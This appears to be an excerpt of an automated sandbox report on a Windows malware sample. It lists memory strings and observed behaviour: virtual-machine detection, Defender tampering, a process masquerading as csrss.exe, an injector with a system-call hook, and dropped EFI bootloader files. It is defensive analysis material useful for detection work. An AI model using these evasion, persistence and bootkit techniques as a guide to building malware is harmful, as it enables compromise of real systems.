          Source: jkDmft1Qoe.exe, 00000004.00000002.681321286.00000000118E2000.00000004.00000001.sdmpBinary or memory string: VMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEJKDMFT1QOE.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEJKDMFT1QOE.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3SVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXEDLLHOST.EXESVCHOST.EXEAUDIODG.EXESVCHOST.EXESVCHOST.EXEWMIADAP.EXEWMIADAP.EXEWMIPRVSE.EXEWMIPRVSE.EXEWMIPRVSE.EXEWMIPRVSE.EXECONHOST.EXEUSOCLIENT.EXEUSOCLIENT.EXESVCHOST.EXESVCHOST.EXEHXTSR.EXEHXTSR.EXE
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: SHAREDINTAPP.EXESMSS.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWININIT.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESIHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXECTFMON.EXESHAREDINTAPP.EXEEXPLORER.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESEARCHUI.EXESEARCHUI.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEAUDIODG.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEWMIADAP.EXEWMIADAP.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: VMUSRVC.EXE
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: SMSS.EXECSRSS.EXEWININIT.EXECSRSS.EXESERVICES.EXEWINLOGON.EXELSASS.EXECSRSS.EXESHAREDINTAPP.EXESERVICES.EXESHAREDINTAPP.EXEWINLOGON.EXESHAREDINTAPP.EXELSASS.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDWM.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESPOOLSV.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEHXTSR.EXEHXTSR.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEJKDMFT1QOE.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEJKDMFT1QOE.EXESHAREDINTAPP.EXE[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
          Source: jkDmft1Qoe.exe, 00000004.00000002.681293770.00000000118DC000.00000004.00000001.sdmpBinary or memory string: JKDMFT1QOE.EXEWINDEFENDER.EXEJKDMFT1QOE.EXEDEFENDERC:\WINDOWS\RSSCREATEDIRECTORYWC:\WINDOWS\RSSGETFILEATTRIBUTESWSETFILEATTRIBUTESWC:\WINDOWS\RSS\CSRSS.EXE"C:\WINDOWS\RSS\CSRSS.EXE"SILENTDUSTC:\WINDOWS\RSS\CSRSS.EXEC:\WINDOWS\RSS\CSRSS.EXEC:\WINDOWS\RSSC:\WINDOWS\RSS\CSRSS.EXECOMPUTERNAME=computerHOMEPATH=\WINDOWS\SYSTEM32NUMBER_OF_PROCESSORS=2PROCESSOR_ARCHITECTURE=X86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_LEVEL=6PROCESSOR_REVISION=5507PROGRAMDATA=C:\PROGRAMDATAPROGRAMW6432=C:\PROGRAM FILESPUBLIC=C:\USERS\PUBLICSYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\WINDOWS\TEMPTMP=C:\WINDOWS\TEMPUSERDOMAIN=WORKGROUPUSERNAME=computer$WINDIR=C:\WINDOWSCOMMONPROGRAMFILESCOMMONPROGRAMFILES(X86)COMMONPROGRAMW6432NUMBER_OF_PROCESSORSPROCESSOR_ARCHITECTUREPROCESSOR_ARCHITEW6432PROCESSOR_IDENTIFIERPROCESSOR_REVISIONPROGRAMFILES(X86)C:\WINDOWS\RSS\CSRSS.EXEC:\WINDOWS\RSS\CSRSS.EXEC:\WINDOWS\RSS\CSRSS.EXE C:\WINDOWS\RSS\CSRSS.EXE ""WMIPRVSE.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXEDLLHOST.EXESVCHOST.EXEAUDIODG.EXESVCHOST.EXESVCHOST.EXEWMIADAP.EXEWMIPRVSE.EXEWMIPRVSE.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXECSRSS.EXESERVICES.EXEWINLOGON.EXELSASS.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESPOOLSV.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESIHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXECTFMON.EXEEXPLORER.EXESVCHOST.EXEDLLHOST.EXECSRSS.EXEWININIT.EXECSRSS.EXESERVICES.EXEWINLOGON.EXELSASS.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESPOOLSV.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESIHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXECTFMON.EXEEXPLORER.EXESVCHOST.EXEDLLHOST.EXESEARCHUI.EXEWMIPRVSE.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXEGLOBAL\H48YORBQ6RM87ZOTALLUSERSPROFILE=C:\PROGRAMDATACOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEHOMEDRIVE=C:PROGRAMFILES=C:\PROGRAM FILES (X86)PROGRAMFILES(X86)=C:\PROGRAM FILES (X86)C:\USERS\user\APPDATA\LOCAL\TEMPC:\USERS\user\APPDATA\LOCAL\TEMP\CSRSSC:\USERS\user\APPDATA\LOCAL\TEMPC:\USERS\user\APPDATA\LOCAL\TEMP\WUPC:\USERS\user\APPDATA\ROAMING\SILENTDUSTC:\USERS\user\DESKTOP\JKDMFT1QOE.EXEC:\USERS\user\DESKTOP\JKDMFT1QOE.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\CSRSSC:\USERS\user\APPDATA\LOCAL\TEMP\CSRSSC:\USERS\user\APPDATA\ROAMING\SILENTDUSTC:\USERS\user\APPDATA\ROAMING\SILENTDUSTC:\USERS\user\APPDATA\LOCAL\TEMP\WUPC:\USERS\user\APPDATA\LOCAL\TEMP\WUPC:\WINDOWSC:\USERS\user\APPDATA\LO
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEAUDIODG.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIADAP.EXEWMIADAP.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEWBEMSCRIPTING.SWBEMLOCATORWBEMSCRIPTING.SWBEMLOCATOR780AA3F8331D9BE005C9E655448606539ACD816F3C5E40127BF62779FBDA063F780AA3F8331D9BE005C9E655448606539ACD816F3C5E40127BF62779FBDA063F
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 2284Thread sleep time: -86000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6376Thread sleep time: -150000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)Jump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\bootx64.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
          Source: C:\Windows\rss\csrss.exeRegistry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: VBoxGuestJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: vmciJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: HGFSJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: VBoxTrayIPCJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,35_2_00007FF6148A5C10
          Source: jkDmft1Qoe.exe, 00000004.00000002.681321286.00000000118E2000.00000004.00000001.sdmpBinary or memory string: xennetxensvcxenvdbsilentdustsilentdust.exe@
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exesmss.exesharedintapp.execsrss.exesharedintapp.exewininit.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesihost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exectfmon.exesharedintapp.exeexplorer.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exeSearchUI.exesearchui.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exeaudiodg.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exeWMIADAP.exewmiadap.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.execsrss.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: vmusrvc.exe
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: qemuvirtual
